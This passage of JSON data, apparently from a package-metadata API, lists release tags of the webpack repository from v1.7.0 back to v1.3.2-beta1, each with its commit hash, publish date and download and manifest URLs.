tps://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":